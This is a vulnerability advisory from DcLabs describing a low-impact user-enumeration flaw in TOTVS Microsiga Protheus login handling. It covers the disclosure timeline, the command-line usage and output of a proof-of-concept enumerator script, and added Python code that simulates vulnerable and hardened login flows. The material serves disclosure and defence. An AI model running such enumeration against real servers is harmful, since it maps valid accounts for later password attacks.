[DCA-2011-0002]
[Discussion]
- DcLabs Security Research Group advises of the following vulnerability:
[Software]
- TOTVS ERP Microsiga Protheus
[Vendor Product Description - translated from Portuguese]
- Management Software - TOTVS
TOTVS is a software, innovation, relationship and management-support
company, the undisputed leader in Brazil with a 49.1% market share and
also in Latin America with 31.2%*; it is the largest application-software
company headquartered in an emerging country and the 7th largest in the
world in its sector. It has more than 25,200 active customers, is
supported by 9,000 participants and is present in 23 countries.
Value Proposition
To make the company more competitive, with faster decision-making, by
offering solutions that organize, discipline, define and enforce
processes, store data, generate information and support management.
- Source: http://totvs.com.br/web/guest/software
[Advisory Timeline]
- 02/Feb/2011 -> Initial contact to vendor, security contact request.
- 03/Feb/2011 -> Security contact response.
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
- 04/Feb/2011 -> Vendor confirms notification received.
- 21/Feb/2011 -> Situation report requested.
- 01/Mar/2011 -> No vendor response.
- 02/Mar/2011 -> Advisory published.
[Bug Summary]
- User enumeration
[Impact]
- Low
[Affected Version]
- Microsiga Protheus 8 (20081215030344)
- Microsiga Protheus 10 (20100812040605)
- Other versions can also be affected but weren't tested.
[Bug Description and Proof of Concept]
- The server validates the username before asking for a password, so the
reply to the username alone reveals whether the account exists: an
attacker can submit usernames until one is answered with a password
prompt, without ever supplying a password.
- A Proof of Concept has been created:
--- command line output begin ---
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help
options:
--version show program's version number and exit
-h, --help show this help message and exit
-i IPADDRESS, --ipaddress=IPADDRESS
Server IP address
-p PORT, --port=PORT Port number (defaults to 1234)
-t TARGET, --target=TARGET
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
Defaults to 10
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
--ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
--- command line output end ---
----------------------------------------------------------------------------------------
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br
[Workarounds]
- An initial workaround was provided that locks an account after 3 failed
password attempts, but it does not stop this kind of user enumeration:
the probe never reaches the password step, so no failed password attempt
is ever recorded.
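The following is an added illustration of the flaw described in the bug description and of why the lockout workaround above does not help. It is not the DcLabs PoC and not the Protheus wire protocol (which this advisory does not document): the two simulated servers, the account table and the wordlist are constructed for the example. The vulnerable server checks the username before prompting for a password and only counts password failures toward lockout; the hardened variant takes both credentials in one step and returns the same reply for an unknown user and a wrong password.

```python
import hashlib
import hmac

# Constructed account table (hypothetical users): username -> SHA-256 of password.
# Plain SHA-256 keeps the example short; a real system would use a slow, salted hash.
USERS = {
    "admin": hashlib.sha256(b"admin-secret").hexdigest(),
    "jonas": hashlib.sha256(b"jonas-secret").hexdigest(),
}
# Hash compared for unknown users so the hardened path does the same work either way.
DUMMY_HASH = hashlib.sha256(b"dummy").hexdigest()
MAX_FAILED_PASSWORDS = 3


class VulnerableServer:
    """Two-step login: the username is checked before a password is requested.

    Mirrors the flaw in the advisory: an unknown name is rejected outright, a
    known name gets a password prompt, so the first reply alone reveals which
    accounts exist. The lockout counter only counts *password* failures.
    """

    def __init__(self):
        self.failed = {u: 0 for u in USERS}

    def send_username(self, username):
        if username not in USERS:
            return "INVALID_USER"
        if self.failed[username] >= MAX_FAILED_PASSWORDS:
            return "LOCKED"
        return "PASSWORD_PROMPT"

    def send_password(self, username, password):
        supplied = hashlib.sha256(password.encode()).hexdigest()
        if hmac.compare_digest(USERS[username], supplied):
            self.failed[username] = 0
            return "OK"
        self.failed[username] += 1
        return "BAD_PASSWORD"


class HardenedServer:
    """Single-step login: username and password arrive together and every
    failure, unknown user or wrong password, gets the same reply."""

    def login(self, username, password):
        stored = USERS.get(username, DUMMY_HASH)
        supplied = hashlib.sha256(password.encode()).hexdigest()
        # Compare in every case so the code path and timing do not depend on
        # whether the username exists.
        matched = hmac.compare_digest(stored, supplied)
        if matched and username in USERS:
            return "OK"
        return "LOGIN_FAILED"


def enumerate_users(server, candidates):
    """What the advisory's PoC does: submit names only and watch for the prompt.

    Returns the set of names the server treated as valid. No password is ever
    sent, so the 3-strike lockout never triggers.
    """
    return {u for u in candidates if server.send_username(u) == "PASSWORD_PROMPT"}


def probe_hardened(server, candidates):
    """Same wordlist against the hardened flow: replies are indistinguishable."""
    return {u: server.login(u, "not-the-password") for u in candidates}


if __name__ == "__main__":
    # Constructed wordlist, hypothetical names only.
    wordlist = ["admin", "fakeuser", "nobody", "jonas", "elvis"]
    v = VulnerableServer()
    print("vulnerable server leaks:", sorted(enumerate_users(v, wordlist)))
    print("password failures recorded:", v.failed)
    print("hardened server replies:", probe_hardened(HardenedServer(), wordlist))
```

Note that on the vulnerable server a locked account still answers differently from an unknown one ("LOCKED" versus "INVALID_USER"), so even a lockout that did fire would not hide which names exist; the fix is the uniform reply of the hardened flow, not a counter.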
[Credits]
DcLabs Security Research Group.
--
Regards,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com